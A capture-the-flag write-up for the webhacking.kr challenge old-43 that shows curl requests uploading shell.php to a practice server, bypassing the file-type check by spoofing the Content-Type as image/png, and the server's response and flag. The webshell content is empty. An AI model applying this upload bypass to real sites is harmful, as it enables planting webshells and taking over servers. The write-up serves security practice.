old-43 -- No Brainer Webshell

For first upload I uploaded a PNG image and it was a success, then I tried php, php5, png%00.php extensions but still got wrong type. After some tinkering I inspected the request itself:

curl 'http://webhacking.kr:10004/index.php' \
  -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynWTWEfEA2qciAE2z' \
  -H 'Cookie: PHPSESSID=fqn9tv8tbam8b4gi2edk8vc8bu' \
  -d $'------WebKitFormBoundarynWTWEfEA2qciAE2z\r\nContent-Disposition: form-data; name="file"; filename="shell.php"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundarynWTWEfEA2qciAE2z--\r\n'

There's 1 more thing we can change: Content-Type -> Content-Type: image/png

└─$ curl 'http://webhacking.kr:10004/index.php' \
  -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynWTWEfEA2qciAE2z' \
  -H 'Cookie: PHPSESSID=fqn9tv8tbam8b4gi2edk8vc8bu' \
  -d $'------WebKitFormBoundarynWTWEfEA2qciAE2z\r\nContent-Disposition: form-data; name="file"; filename="shell.php"\r\nContent-Type: image/png\r\n\r\n\r\n------WebKitFormBoundarynWTWEfEA2qciAE2z--\r\n'
<html>
<head>
<title>Challenge 43</title>
</head>
<body>
<hr>
You must upload webshell and cat <b>/flag</b>
<hr>
Done!<br><br><a href=./upload/shell.php>./upload/shell.php</a><form method=post enctype="multipart/form-data" action=index.php>
<input name=file type=file><input type=submit>
</form>
</body>
</html>

Hmm... The php script was empty when trying to execute the commands!

I decided to investigate with Burp and when I uploaded the file it was a success without changing the headers...

FLAG{V2hhdCBkaWQgeW91IGV4cGVjdD8=}

I expected a little more lol

Previousold-42 -- Client Download Restriction Nextold-43 Revenge -- PHP In Image

Last updated 7 months ago